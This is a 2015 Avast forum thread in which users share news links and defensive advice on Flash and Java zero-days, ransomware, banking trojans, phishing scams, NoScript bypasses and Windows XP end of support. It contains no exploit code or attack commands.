Whitepaper on the mitigation attack: http://h30499.www3.hp.com/hpeb/attachments/hpeb/off-by-on-software-security-blog/599/1/WP-Hariri-Zuckerbraun-Gorenc-Abusing_Silent_Mitigations.pdf
polonus
-
Update this optional MS update: https://support.microsoft.com/en-us/kb/3045645
to protect against a specific Banking Trojan that disables/hides UAC alerts.
polonus
-
The many enemies of Google - EU antitrust case: http://www.reuters.com/article/2015/04/27/us-eu-google-antitrust-idUSKBN0NF1YX20150427
Main Outer Category of complainants (19 in total) is formed by Microsoft, ICOMP, FairSearch, Beuc and The Open Internet Project.
Maybe the New Atlantic and International Trade Agreement will come in time so this antitrust case could/would never materialize, because it would overrule the outcome anyway.
polonus
-
Emergency Flash Player 18.0.0.194 update.
Adware free offline installers :
Active X : https://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player_ax.exe
NPAPI : https://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player.exe
PPAPI : https://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player_ppapi.exe
Greetz, Red.
-
Millions and millions of dollars lost through CryptoWall ransomware:
http://www.ic3.gov/media/2015/150623.aspx
Update your AV, use a firewall, use a decent ad-/pop-up-/script blocker and stay alert!
polonus
-
Registry Cleaners: Digital Snake Oil
https://blog.malwarebytes.org/social-engineering/2015/06/digital-snake-oil/?utm_source=Gplus&utm_medium=social
Google Takes a Stand Against Revenge Porn
https://blog.malwarebytes.org/privacy-2/2015/06/google-takes-a-stand-against-revenge-porn/?utm_source=Gplus&utm_medium=social
-
It's always nice to get confirmation from a reputable place on something I've been preaching for many years. :)
-
Security researcher casually drops Adobe Reader, Windows critical vulnerability bomb
http://www.zdnet.com/article/security-researcher-casually-drops-adobe-reader-windows-critical-vulnerability-bomb/
-
216 million dollar damage causing HawkEye keylogger e-mail fraud alert: https://www.fsisac.com/sites/default/files/news/BEC_Joint_Product_Final.pdf
polonus
-
Navy signs $9.1 million contract with Microsoft to keep Windows XP afloat
www.winbeta.org/news/navy-signs-91-million-contract-microsoft-keep-windows-xp-afloat
-
I agree I have stopped messing with the registry cleaner even in CCleaner.
Once after I "cleaned" the registry in my Win7 I ended up having to restore what CCleaner cleaned.
Never again. Leave the registry alone.
If it ain't broke, don't fix it!
-
Fake Bank of America Twitter Feed Leads to Phishing Page
https://blog.malwarebytes.org/fraud-scam/2015/06/fake-bank-of-america-twitter-feed-leads-to-phishing-page/?utm_source=Gplus&utm_medium=social
Navy signs $9.1 million contract with Microsoft to keep Windows XP afloat
www.winbeta.org/news/navy-signs-91-million-contract-microsoft-keep-windows-xp-afloat
I wonder if this will affect all of the XP systems everywhere. ???
-
Samsung disabling Windows update, explained away as providing a choice: https://grahamcluley.com/2015/06/samsung-disabled-windows-update/
link article author = Graham Cluley
polonus
-
Some choice - there has always been a choice in the OS if the user wishes to disable windows update and there are the usual warnings of doing so.
When Samsung do this the user doesn't have a choice as they would be unaware that they had disabled WU. So they live in ignorance that their system is at potential risk from vulnerabilities being exploited.
-
Magento Platform Targeted By Credit Card Scrapers
https://blog.sucuri.net/2015/06/magento-platform-targeted-by-credit-card-scrapers.html
-
Greenpeace: bad Amazon - good Apple!
http://www.greenpeace.org/usa/Global/usa/planet3/PDFs/clickingclean.pdf
See attached
Don't see how this has anything to do with SECURITY WARNINGS & Notices, even more so nothing to do with these forums.
<off-topic>For me Greenpeace = Bad, if you don't fit their agenda your mad.</off-topic>
-
I also don't see a correlation of that chart to computer security ???
-
Hi bob3160 and DavidR,
That is why I have removed the posting on second thoughts. I found the article link on a Dutch security site (webworld).
Amazon has come under quite some "flak" lately (for bundling deals) and now also for the amount of CO2 that goes into the clicks they score ;D
polonus
-
To Save, or Not to Save, That is the Question
https://blog.malwarebytes.org/online-security/2015/06/to-save-or-not-to-save-that-is-the-question/?utm_source=Gplus&utm_medium=social
-
Microsoft silently added 18 root certificates to Windows, according to: https://twitter.com/Hexatomium/status/614760398940708864
Silently performed in combination with Cisco: https://news.ycombinator.com/item?id=9789819
On this link I get a "your connection is not private" alert from Google: https://www.wilderssecurity.com/threads/rcc-check-your-systems-trusted-root-certificate-store.373819/
Background read: https://ma.ttias.be/the-broken-state-of-trust-in-root-certificates/
pol
-
Google's One Account for Everywhere is not a handy feature only as Google says, it is also an additional threat where attackers could have access everywhere!
When an attacker has a foothold on your desktop that now means also on all of your peripherals.
Read: http://www.prep-blog.com/2014/05/05/which-is-the-greater-threat-govt-or-corporate-intrusion/
polonus
-
Did you read this: http://dontbubble.us/?kad=en_US
When you visit the page and you see what my fingerprinting detection extension has to report;
CanvasFingerprintBlock
Blocked 800 potential HTML canvas fingerprinting attempts on this page
Prevented a script on http://dontbubble.us from capturing the point (1, 8) on the following 35px × 35px canvas:
Prevented a script on http://dontbubble.us from capturing the point (2, 8) on the following 35px × 35px canvas:
Prevented a script on http://dontbubble.us from capturing the point (3, 8) on the following 35px × 35px canvas:
Why the fingerprinting there?
polonus
-
Already asked attention for this on many occasions in the past, but many, many websites are insecure because of outdated and unpatched CMS like WordPress (plug-ins and themes, especially free versions). The situation for jQuery scripts might even be worse; many online website versions have not been altered or updated from the word go = installation date. Here we see sheer incompetence of web admins and hosters alike and this is putting the average user at risk. How long will polonus still be a voice crying in the wilderness?
Example: https://forum.avast.com/index.php?topic=172901.0
polonus (volunteer website security analyst and website error-hunter)
-
New Exploitkit "Sundown" aims at user that has not updated Adobe Flash Player!
Adobe "the new Java" of our time!
Read: http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html
Analysis: https://www.virusbtn.com/virusbulletin/archive/2015/06/vb201506-Beta-BEP
Info credits go to: Aditya Sood and Rohit Bansal
polonus
When I clicked on the "Don't need coffee" website, my Avast piped up that it blocked an infection on that page.
-
Maybe the page exposed some of that code and Avast alerted that. There is no payload, so you are safe.
polonus
-
I'm suspecting code get exposed because a user like myself, does not run NoScript in their browser. Correct?
-
Arguably the best Anti-Virus for Windows is giving pirates a chance to turn into legit users for free
http://betanews.com/2015/06/28/arguably-the-best-anti-virus-for-windows-is-giving-pirates-a-chance-to-turn-into-legit-users-for-free/
http://venturebeat.com/2015/06/28/malwarebytes-offers-pirates-and-duped-customers-12-months-of-its-premium-antimalware-product-for-free/
-
So this link post by Charyb is a bloody scam >:( :o https://forum.avast.com/index.php?topic=172326.0
Which I've already bought 1 license via PayPal for my father laptop which I've kept every record of my order, MAN! I'm bloody PI$$ED OFF and real MAD!
CHARYB Please EXPLAIN WHY!
-
Oh shit sorry about your loss. Sorry mate, I have no idea about that link you posted. What I can do for you is that I can go to Malwarebytes antimalware forum and mention that link that you have posted along with the 2 links that I have mentioned in my previous post and will check with them which ones is true and false.
-
@ Staticguy
You don't have to do anything. Malwarebytes is aware of this.
-
@ Staticguy thanks, I'm dealing with this issue at the MBAM forum as I have to sit tight and wait until they fully investigate. This is my very first mistake in nearly 20 years behind a computer and I am totally ashamed :-[
-
SSLv3 now dead: http://www.theregister.co.uk/2015/06/26/that_shot_you_heard_sslv3_is_now_dead/
link article author = Richard Chirgwin
polonus
-
Recent Flash Player 0-day Exploit Goes Mainstream
https://blog.malwarebytes.org/exploits-2/2015/06/recent-flash-player-0-day-exploit-goes-mainstream/?utm_source=Gplus&utm_medium=social
-
SSLv3 now dead: http://www.theregister.co.uk/2015/06/26/that_shot_you_heard_sslv3_is_now_dead/
link article author = Richard Chirgwin
polonus
Good thing SSL doesn't exist in Chrome.
-
You're welcome for helping you point in the right direction :). Everyone makes mistakes, mate, whether they are a beginner or an expert. Nobody is perfect. I too have been there, done that, and lessons are learned. Hope now everything is ok at your end?
-
Hacked routers are spreading Dyre aka Dyreza banker trojan malware:
http://www.brycampbell.co.uk/new-blog/2015/6/24/compromised-airos-routers-being-used-by-dyre
link alert by author Bryan Campbell.
An in-depth analysis of this malcode: http://christophe.rieunier.name/securite/Dridex/20150608_dropper/Dridex_dropper_analysis.php
link article author = Christophe Rieunier
polonus
-
Most internet anonymity software leaks users’ details -
"VPN services are secure" is a myth!
Read: http://www.qmul.ac.uk/media/news/items/se/158459.html
Research paper: http://www.eecs.qmul.ac.uk/~hamed/papers/PETS2015VPN.pdf
See survey attached.
polonus
-
It's nice to see that Avast's SecureLine isn't on that list. :)
-
I believe the absence of Avast SecureLine means that it wasn't part of the test as indicated by the subtitle of the attachment. It would have been "nicer" to see that it WAS on the list with a green "N" in each column. Since it apparently wasn't tested there's no way to know whether its absence is a good or bad thing.
-
You can test yourself here: https://ipleak.net/
dnsleaktest seems down - https://downornotworking.com/dnsleaktest.com/
polonus
Also read here: https://forum.avast.com/index.php?topic=123059.0
And a review here: http://www.expertreviews.co.uk/software/internet-security/1400543/avast-secureline-vpn-review
Mixed feelings expressed here: http://www.reddit.com/r/VPN/comments/1zgj84/avast_secureline_vpn/
Further measures to be taken by users (interesting): http://lifehacker.com/5902397/how-to-make-vpns-even-more-secure
pol
-
The NoScript extension in Firefox can be circumvented via Google cloud and the whitelisted-by-default googleapis dot com.
Read: http://thehackerblog.com/the-noscript-misnomer-why-should-i-trust-vjs-zendcdn-net/
link article author = Matthew Bryant
Code to bypass noscript: https://twitter.com/avlidienbrunn/status/615659880788193280 (Mathias Karlsson).
The original idea: http://labs.detectify.com/post/122837757551/using-google-cloud-to-bypass-noscript
by Linus Särud, junior security researcher.
polonus
-
The NoScript extension in Firefox can be circumvented via Google cloud and the by-default whitelisted googleapis dot com.
Read: http://thehackerblog.com/the-noscript-misnomer-why-should-i-trust-vjs-zendcdn-net/
link article author = Matthew Bryant
Code to bypass NoScript: https://twitter.com/avlidienbrunn/status/615659880788193280 (Mathias Karlsson).
The original idea: http://labs.detectify.com/post/122837757551/using-google-cloud-to-bypass-noscript
by Linus Särud, junior security researcher.
polonus
I wiped NoScript's default whitelist long ago. This is actually old news, since any whitelisted site (even by the user) can execute scripts and other content on the page.
Edit: Took my reply out of the quote. Sorry
-
The NoScript extension in Firefox can be circumvented via Google cloud and the by-default whitelisted googleapis dot com.
Read: http://thehackerblog.com/the-noscript-misnomer-why-should-i-trust-vjs-zendcdn-net/
link article author = Matthew Bryant
Code to bypass NoScript: https://twitter.com/avlidienbrunn/status/615659880788193280 (Mathias Karlsson).
The original idea: http://labs.detectify.com/post/122837757551/using-google-cloud-to-bypass-noscript
by Linus Särud, junior security researcher.
polonus
Generally I allow googleapis.com in NoScript, but another blocking option could be to use RequestPolicy to specifically block *.googleapis if required.
-
Fake Twitter Verification Profile leads to Phishing, Credit Card Theft
https://blog.malwarebytes.org/fraud-scam/2015/06/fake-twitter-verification-profile-leads-to-phishing-credit-card-theft/?utm_source=Gplus&utm_medium=social
Driver Updaters: Digital Snake Oil, Part 2
https://blog.malwarebytes.org/social-engineering/2015/06/driver-updaters-digital-snake-oil-part-2/?utm_source=Gplus&utm_medium=social
WhatsApp Elegant Gold Hits the Digital Catwalk
https://blog.malwarebytes.org/fraud-scam/2015/07/whatsapp-elegant-gold-hits-the-digital-catwalk/?utm_source=Gplus&utm_medium=social
-
Not only snake oil, but snake oil that normally comes free as free driver downloads on the Interwebs, while these services come to charge you for similar driver downloads: an outright scam. Scammers are always on the look-out to rip off an extra buck from the backs of the unaware and the meek. We won't be fooled again! (The same goes for registry vacuum cleaners, also added to PUP detection by MBAM; good action, folks, good action.)
pol
-
Driver Updaters: Digital Snake Oil, Part 2
https://blog.malwarebytes.org/social-engineering/2015/06/driver-updaters-digital-snake-oil-part-2/?utm_source=Gplus&utm_medium=social
Everything would seem to indicate that updating drivers should be a good thing, and there are several reputable driver updater programs in existence.
The secret is in eliminating the crap and picking out a good one. :)
-
Hi bob3160,
The bad thing is the user has to fend for himself more and more now.
You are no longer protected, you are out on your own.
You have to block, you have to take the crap from downloads.
You have become both product and often also a victim of cheap tricks.
How can you trust anything online as an unaware user finding yourself in such a situation?
Users are had big time, when not from the one side then from the other.
It is a dangerous digital world out there and one is out on one's own.
Conclusion.
Good that we have the Avast support forums to provide users with a bit of honest guidelines.
Here we still say - a man a man - a word a word - rare to be found nowadays, a place to trust;
let's cherish that, bob3160, let us cherish that. It is so rare these days.
polonus
P.S. Updating drivers is not always and under all circumstances a good thing or needed; it might sometimes add to your problems. Forewarned is forearmed.
D
-
Hi bob3160,
The bad thing is the user has to fend for himself more and more now.
You are no longer protected, you are out on your own.
You have to block, you have to take the crap from downloads.
You have become both product and often also a victim of cheap tricks.
How can you trust anything online as an unaware user finding yourself in such a situation?
Users are had big time, when not from the one side then from the other.
It is a dangerous digital world out there and one is out on one's own.
Conclusion.
Good that we have the Avast support forums to provide users with a bit of honest guidelines.
Here we still say - a man a man - a word a word - rare to be found nowadays, a place to trust;
let's cherish that, bob3160, let us cherish that. It is so rare these days.
polonus
P.S. Updating drivers is not always and under all circumstances a good thing or needed; it might sometimes add to your problems. Forewarned is forearmed.
D
I've never had an outdated driver replaced with a newer signed driver that presented a problem.
Legitimate programs also don't request that you pay to update. You'll find a recommendation at:
https://forum.avast.com/index.php?topic=19387.msg1205358#msg1205358
(I don't allow it to run at system start. I start it manually when I want to check for updates; both program and driver updates.)
-
The NoScript extension in Firefox can be circumvented via Google cloud and the by-default whitelisted googleapis dot com.
Read: http://thehackerblog.com/the-noscript-misnomer-why-should-i-trust-vjs-zendcdn-net/
link article author = Matthew Bryant
Code to bypass NoScript: https://twitter.com/avlidienbrunn/status/615659880788193280 (Mathias Karlsson).
The original idea: http://labs.detectify.com/post/122837757551/using-google-cloud-to-bypass-noscript
by Linus Särud, junior security researcher.
polonus
Fixed in V2.6.9.29 :) -> https://noscript.net/changelog
-
Is your Google Chrome browser hooked into BeEF? Protect with Vegan, read: http://blog.cylance.com/vegan-chrome-extension-to-defeat-beef
polonus
-
You want to share Wifi access with all of your Outlook, Skype and Facebook contacts within reach of your local network access point?
You have second thoughts also? Then read on.
Wifi Sense does just that and was introduced for the first time when it sneaked into Windows Phone 8.1 and no one reacted, but now that this feature comes to Windows 10 security experts make some really deep frowns. Windows stores your password encrypted in the cloud and then shares it with all your acquaintances (contacts) within the reach of your local network. This feature is on by default and the user has to disable it actively (only for that particular device). For the network an adaptation of the SSID is necessary by adding the string "_optout". Security experts call the feature "a cheap hack" and a security breach of Wifi networking as such! Certainly a risk for the not so technically adept user. Modern OSes get more and more one-way invasive and one has to go into technical trouble to get at the settings that one really prefers. It is almost like "we will decide what is good for you", whether you share your access, whether we will show you personalised ads that are very difficult to block etc. etc., and all these "handy features", whether you like it or not, are slowly creeping in, so young users do not know of an alternative situation as where we came from to land here.
polonus
-
What about the risks when you combine this feature with an access risk at distance like ProxyHam?
Why would you have to combine the "_optout" suffix MS thinks you should add to your SSID with the alternative "_nomap" suffix Google comes up with? And this knowing that an SSID has a maximum of only 32 positions and "_nodrive_optout" alone is almost half of that number? MS, this is a very bad idea.
Don't these Redmond boys have a quality validation department to keep such bad security features out?
Again MS is choosing user friendliness over a definite security risk? (info credits from a thread started by Anak Krakatau)
polonus
-
The Grey Side of Mobile Advertising
https://blog.malwarebytes.org/mobile-2/2015/07/the-grey-side-of-mobile-advertising/?utm_source=Gplus&utm_medium=social
-
The Grey Side of Mobile Advertising
https://blog.malwarebytes.org/mobile-2/2015/07/the-grey-side-of-mobile-advertising/?utm_source=Gplus&utm_medium=social
Something related to this was published before on Avast blog... If I'm not wrong...
-
Microsoft Moves to Kill Silverlight, Tells Everyone to Stop Using It
http://news.softpedia.com/news/microsoft-moves-to-kill-silverlight-tells-everyone-to-stop-using-it-485970.shtml
-
Microsoft Moves to Kill Silverlight, Tells Everyone to Stop Using It
http://news.softpedia.com/news/microsoft-moves-to-kill-silverlight-tells-everyone-to-stop-using-it-485970.shtml
And there was me thinking they never started to use it - another MS idea/solution looking for a problem to solve.
-
Plex has been hacked, so be sure to change your passwords
www.phandroid.com/2015/07/02/plex-hacked/
Plex blog https://blog.plex.tv/
-
Migrate now before it is too late: deadline July 14th, 2015. MS no longer supports security patches for Server 2003. The best choice, depending on circumstances, is to migrate to Windows Server 2012 R2.
polonus
-
Facebook Phishing via Apps is Alive and Well
https://blog.malwarebytes.org/fraud-scam/2015/07/facebook-phishing-via-apps-is-alive-and-well/?utm_source=Gplus&utm_medium=social
-
Hi all,
I'm new to these forums, but decided to make an account because I noticed some alarming email addresses on my Avast homepage. I have Avast installed on 3 of my computers, and I notice the email address is different on each of my computers. They use suspicious addresses like "gmai.com" or "gamil.com". I'm pretty sure these are scam email addresses, but I'm wondering why they're appearing on my Avast homepage. Is anyone else experiencing this? And is this something I should be worried about?
-
Please don't post the same thing in several threads.
Your question was answered in the other thread.
https://forum.avast.com/index.php?topic=173195.msg1229946#msg1229946
-
Hi all,
I'm new to these forums, but decided to make an account because I noticed some alarming email addresses on my Avast homepage. I have Avast installed on 3 of my computers, and I notice the email address is different on each of my computers. They use suspicious addresses like "gmai.com" or "gamil.com". I'm pretty sure these are scam email addresses, but I'm wondering why they're appearing on my Avast homepage. Is anyone else experiencing this? And is this something I should be worried about?
This shouldn't be in this topic but in one of its own. On the my.avast.com matter I see you have one in the General sub-forum; I will respond to that one.
-
Hackers hacked: Malware firm's data leaked, ties with regimes exposed
http://rt.com/news/271855-italian-hacker-firm-hacked/
-
[openssl-announce] Forthcoming OpenSSL releases
https://mta.openssl.org/pipermail/openssl-announce/2015-July/000037.html
-
Network security and website security need technical IT to get us more secure.
Security specialists should better protect against a full range of security breaches (vulnerabilities, exploits, bugs); common attackers just need one workable tiny hole to worm through to be able to compromise a full network/website and do their evil deeds. I just had a discussion today with some technical IT people and they confirmed what I post here.
As I experience from my daily cold reconnaissance scanning, the situation is so critical that something needs to be done (education, secure coding, secure configuration etc. etc.). Protocols and platforms are introduced before they have been properly secured and are invariably rather insecure (virtually insecure code, features over security, user friendliness that creates security issues).
For instance, we make the transition to https only while the configuration and settings are basically insecure: loads of websites still have a log-in where log-in data go over the wire in plain text, with no security headers implemented.
polonus (volunteer website security analyst and website error-hunter)
-
Pre-patch announcement for Openssl: https://mta.openssl.org/pipermail/openssl-announce/2015-July/000037.html
Curious whether LibreSSL was more secure in these respects ;)
polonus
-
Pre-patch announcement for Openssl: https://mta.openssl.org/pipermail/openssl-announce/2015-July/000037.html
See Reply #3868... ;)
-
CS:GO Lottery Sites Under Attack From…Usernames and XSS?!
https://blog.malwarebytes.org/hacking-2/2015/07/csgo-lottery-sites-under-attack-from-usernames-and-xss/?utm_source=Gplus&utm_medium=social
Hacking Team Leak Exposes New Flash Player Zero Day
https://blog.malwarebytes.org/exploits-2/2015/07/hacking-team-leak-exposes-new-flash-zero-day/?utm_source=Gplus&utm_medium=social
Common Website Security Terminology Defined
https://blog.sucuri.net/2015/07/common-website-security-terminology-defined.html?utm_campaign=Website%20Security&utm_medium=social&utm_source=googleplus
10 Tips to Improve Your Website Security
https://blog.sucuri.net/2015/06/10-tips-to-improve-your-website-security.html?utm_campaign=Website%20Security&utm_medium=social&utm_source=linkedin
-
FBI seeks to re-start the 1990s crypto-wars: https://www.eff.org/deeplinks/2015/07/fbis-revival-crypto-wars-part-ii-continues-two-hearings-congress
If they succeed, targets could wait for their next "birthday attack". ;D
polonus
O.K. And because of the Flash Player Zero Day it is better for users to disable Flash on computers!
-
PSA: Flash Zero-Day Now Active in The Wild
https://blog.malwarebytes.org/exploits-2/2015/07/neutrino-ek-leverages-latest-flash-0day/
Adobe to Patch Hacking Team’s Flash Zero-Day
http://krebsonsecurity.com/2015/07/adobe-to-patch-hacking-teams-flash-zero-day/
-
Steam Keygen Video Leads to PUPs Galore
https://blog.malwarebytes.org/online-security/2015/07/steam-keygen-video-leads-to-pups-galore/?utm_source=Gplus&utm_medium=social
-
OPM hack may have affected 32 million government employees
www.marketwatch.com/story/opm-hack-may-have-affected-32-million-government-employees-2015-07-08
http://abcnews.go.com/US/exclusive-25-million-affected-opm-hack-sources/story?id=32332731
-
DirectRev Malvertising Uses Self Sufficient Flash 0Day
https://blog.malwarebytes.org/malvertising-2/2015/07/directrev-malvertising-uses-self-sufficient-flash-0day/?utm_source=Gplus&utm_medium=social
Hackers get hacked!
http://rt.com/news/271855-italian-hacker-firm-hacked/
-
Data of 26.2 million Americans were stolen!
Data breaches in USA go on and on: https://www.opm.gov/cybersecurity/
Be vigilant: http://www.dhs.gov/how-do-i/report-cyber-incidents
polonus
-
A lot of ransomware can be easily detected and stopped: http://www.eurecom.fr/en/publication/4548/detail/cutting-the-gordian-knot-a-look-under-the-hood-of-ransomware-attacks
polonus
-
2nd unpatched 0day Adobe Flash exploit in the Hacking Team gate ;)
https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html
as bonus some details about Adobe Open Font Manager vulnerability from Hacking Team gate ;)
http://blog.trendmicro.com/trendlabs-security-intelligence/a-look-at-the-open-type-font-manager-vulnerability-from-the-hacking-team-leak/
-
Another reason to disable or uninstall Java: http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-trend-micro-discovers-new-java-zero-day-exploit/ (vulnerability in Java 8 update 45).
polonus
-
OT:- Well, I'm glad I uninstalled Java a very long time ago ;)
-
Malware-Guns For Hire
https://blog.malwarebytes.org/hacking-2/2015/07/hackingteam-malware-guns-for-hire/?utm_source=Gplus&utm_medium=social
-
In addition to mechanisms that help them evade detection by sandboxes and dynamic detection tools,
Kofer variants also include embellishments that attempt to fool malware researchers ...
http://www.infosecurity-magazine.com/news/ransomware-operation-kofer-mutates/
A Microsoft Office functionality that has been in use since the early 1990s can be exploited to deliver malicious, executable files to users ...
http://www.net-security.org/secworld.php?id=18596
http://seclists.org/bugtraq/2015/Jul/23
-
Fake “Microsoft Official Promotion” Email Offers £450,000 Prize
https://blog.malwarebytes.org/fraud-scam/2015/07/fake-microsoft-official-promotion-email-offers-450000-prize/?utm_source=Gplus&utm_medium=social
-
Fake “Microsoft Official Promotion” Email Offers £450,000 Prize
https://blog.malwarebytes.org/fraud-scam/2015/07/fake-microsoft-official-promotion-email-offers-450000-prize/?utm_source=Gplus&utm_medium=social
There are many Microsoft Email scams:
https://forum.avast.com/index.php?topic=81030.msg1212706#msg1212706
-
Mozilla Firefox deems all versions of Adobe Flash vulnerable and has blocked the plugin until the problem is fixed! Currently I am using the latest version, of course: 18.0.0.203
https://support.mozilla.org/en-US/kb/set-adobe-flash-click-play-firefox
-
Using Adobe Flash Player is a bad habit, like smoking:
http://blog.trendmicro.com/trendlabs-security-intelligence/the-adobe-flash-conundrum-old-habits-die-hard/
Firefox browser now blocks all versions: https://addons.mozilla.org/en-US/firefox/blocked/p946
polonus
-
Using Adobe Flash Player is a bad habit, like smoking:
And Drinking and a lot of other bad things..... :)
-
Such things happen when Adobe fails to deliver a fix for an exploited vulnerability in time ... ;D
Anyway, Adobe just released the .209 build, so let's wait till another exploit is abused ITW.
-
PUP makers, Digital Snake Oil Part 3
https://blog.malwarebytes.org/social-engineering/2015/07/pup-makers-digital-snake-oil-part-3/?utm_source=Gplus&utm_medium=social
-
Adobe promises patch for latest wave of critical Hacking Team zero-day exploits
http://www.zdnet.com/article/adobe-promises-patch-for-latest-wave-of-critical-hacking-team-zero-day-exploits/
-
Java zero-day security flaw exploited in the wild
http://www.zdnet.com/article/java-zero-day-security-flaw-exploited-in-the-wild/
-
When you do not need Java, and only cannot do without it on rare occasions, you had better uninstall it.
It is a never-ending story of zero-days. Like the Janus gate in Rome: as Rome was always at war somewhere, the gate was never closed (which was only done at peace time), so they made that gate a passthrough later.
polonus
-
More malvertising than ever before: http://www.invincea.com/2015/07/advanced-endpoint-threat-trend-highlights-june-2015-malvertising-gone-wild/
I hope users understand why they cannot go without a decent ad-blocker, I personally use uBlock Origin combined with Adguard and the general protection of Avast (account protection and shields) and Avast Online Security.
Google has a large specialist team to fight mal-ads, but still a lot of SEO Spam, criminal, scam and fraudulent ads slips through or is silently condoned. Use click-to-play for Flash content!
Blocking third-party content with uMatrix in Google Chrome will help, or work your Firefox browser with the NoScript and RequestPolicy extensions.
polonus
-
Microsoft Security Bulletin Summary for July 2015
https://technet.microsoft.com/library/security/ms15-jul
-
180 million users that stayed on XP now run serious risks as support for it ended!
MSRT no longer functions on XP. 12% of the users are now out on an unsupported OS;
that is a scary situation and a danger also!
Re: http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Cybercriminals will have "a walk in the park" with XP!
polonus
-
180 million users that stayed on XP now run serious risks as support for it ended!
MSRT no longer functions on XP. 12% of the users are now out on an unsupported OS;
that is a scary situation and a danger also!
Re: http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Cybercriminals will have "a walk in the park" with XP!
polonus
Sorry, but this is more FUD from MS trying to kill it off and make people buy win10. This tune hasn't changed for the years leading up to and after XP support was ended, and the world is still spinning.
There are some people that it doesn't matter what OS they use, they are likely to get hit because of unsafe practices and others who are unlikely to get hit because of their safe practices.
-
But there are others that find it hard to mitigate because of a lack of an alternative. Large department stores with XP-driven cash systems are left out in the cold.
And I agree with you there are millions out there that should not have a "puter" because the way they run it is endangering themselves and others also. Driving an OS without a license should be considered as an offense.
polonus
-
You wanted an attacker to have admin rights? I think you won't!
Read why you'd better update:
https://technet.microsoft.com/en-us/library/security/2974294
polonus
-
But there are others that find it hard to mitigate because of a lack of an alternative. Large department stores with XP-driven cash systems are left out in the cold.
And I agree with you there are millions out there that should not have a "puter" because the way they run it is endangering themselves and others also. Driving an OS without a license should be considered as an offense.
polonus
Well in the UK as far as I'm aware, The National Health Service (NHS) are paying a lot of money so that their XP systems continue to be updated. This is the same as some large companies paying for support for their XP Point Of Sale (POS) systems.
This has led to the SP4 hack so XP systems can continue receiving XP POS updates; no doubt in due course MS will kill this hack to try and drive them towards a win10 purchase, as they won't be eligible for a free OS upgrade (as legit versions of Win7 and win8.x are).
-
Webutation Distributing Malware Through Safety Badge
https://blog.sucuri.net/2015/07/webutation-distributing-malware-through-safety-badge.html?utm_campaign=Security%20Advisory&utm_content=18261859&utm_medium=social&utm_source=googleplus
-
But there are others that find it hard to mitigate because of a lack of an alternative. Large department stores with XP-driven cash systems are left out in the cold.
And I agree with you there are millions out there that should not have a "puter" because the way they run it is endangering themselves and others also. Driving an OS without a license should be considered as an offense.
polonus
The Unofficial SP4 for Windows XP: http://www.ryanvm.net/forum/viewtopic.php?t=10321&postdays=0&postorder=asc&start=0
Extends updates for an additional 5 years. I would still recommend upgrading but, if that's not possible,
this is better than the alternative: No Updates....
-
No-one needs flash anymore: https://support.google.com/chrome/answer/108086?hl=en
polonus
-
No-one needs flash anymore
Agreed Pol, I dropped it several months ago and don't miss it... ;)
-
Still installed on my end, no malware or exploit yet :D
-
Hi Steven Winderlich,
You were lucky then, as you know that Adobe Flash needs constant updating, and then again no one needs it now for vids or whatever.
So I hope it will not "zombie" upon you. Just an example of what can happen with exploits. Here is a scan: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fblackorwhite.nl%2F where I searched for "comment", with at the back of my head what was proposed here: http://blog.9bplus.com/if-i-were-an-attacker-third-party-js-librarie/ I am not an attacker, but just now imagine how easily this could have been done. Always remember: those that want to protect just need the whole manual to get full protection, an attacker just needs one little wormhole.
pol
-
I still have Flash and Java installed and Avast or me myself keep it up-to-date as much as possible :)
-
I still have Flash and Java installed and Avast or me myself keep it up-to-date as much as possible :)
The problem is that the updates only happen after another vulnerability has been discovered and left you exposed. :(
-
No-one needs flash anymore: https://support.google.com/chrome/answer/108086?hl=en
polonus
Flash isn't dead at all:
Adobe Flash Player is directly integrated with Google Chrome and enabled by default. Available updates for Adobe Flash Player are automatically included in Chrome system updates.
A.) It's still there, you just don't see it any more in Chrome, but it is there and updated as part of Chrome.
B) You have got to be using Chrome, so that isn't going to happen for everyone (me for one).
I still have Flash and Java installed and Avast or me myself keep it up-to-date as much as possible :)
The problem is that the updates only happen after another vulnerability has been discovered and left you exposed. :(
So the same is true of Chrome&Flash, vulnerabilities can still be exploited before Chrome is updated.
-
No-one needs flash anymore: https://support.google.com/chrome/answer/108086?hl=en
polonus
Flash isn't dead at all:
Adobe Flash Player is directly integrated with Google Chrome and enabled by default. Available updates for Adobe Flash Player are automatically included in Chrome system updates.
A.) It's still there, you just don't see it any more in Chrome, but it is there and updated as part of Chrome.
B) You have got to be using Chrome, so that isn't going to happen for everyone (me for one).
I still have Flash and Java installed and Avast or me myself keep it up-to-date as much as possible :)
The problem is that the updates only happen after another vulnerability has been discovered and left you exposed. :(
So the same is true of Chrome&Flash, vulnerabilities can still be exploited before Chrome is updated.
That's why you also run Flashcontrol (https://chrome.google.com/webstore/detail/flashcontrol/mfidmkgnfgnkihnjeklbekckimkipmoe?hl=en) in Chrome. :)
-
No-one needs flash anymore: https://support.google.com/chrome/answer/108086?hl=en
polonus
Flash isn't dead at all:
Adobe Flash Player is directly integrated with Google Chrome and enabled by default. Available updates for Adobe Flash Player are automatically included in Chrome system updates.
A.) It's still there, you just don't see it any more in Chrome, but it is there and updated as part of Chrome.
B) You have got to be using Chrome, so that isn't going to happen for everyone (me for one).
I still have Flash and Java installed and Avast or me myself keep it up-to-date as much as possible :)
The problem is that the updates only happen after another vulnerability has been discovered and left you exposed. :(
So the same is true of Chrome&Flash, vulnerabilities can still be exploited before Chrome is updated.
That's why you also run Flashcontrol (https://chrome.google.com/webstore/detail/flashcontrol/mfidmkgnfgnkihnjeklbekckimkipmoe?hl=en) in Chrome. :)
Yes, but you miss my point: Flash is still present, as are potential vulnerabilities which could be exploited. How are you to know that there isn't a potential vulnerability when you give Flashcontrol the OK to load it?
It may well limit the risk but it doesn't completely remove it.
NoScript can also restrict the running of Flash (and JAVA if you have that too), also in the Flash Player settings you can restrict it from storing data on your system.
So there are ways to limit risk, but not completely remove it, this is why hard disk imaging is the way to go for a backup and recovery strategy.
-
ILOVEYOU – SPAM
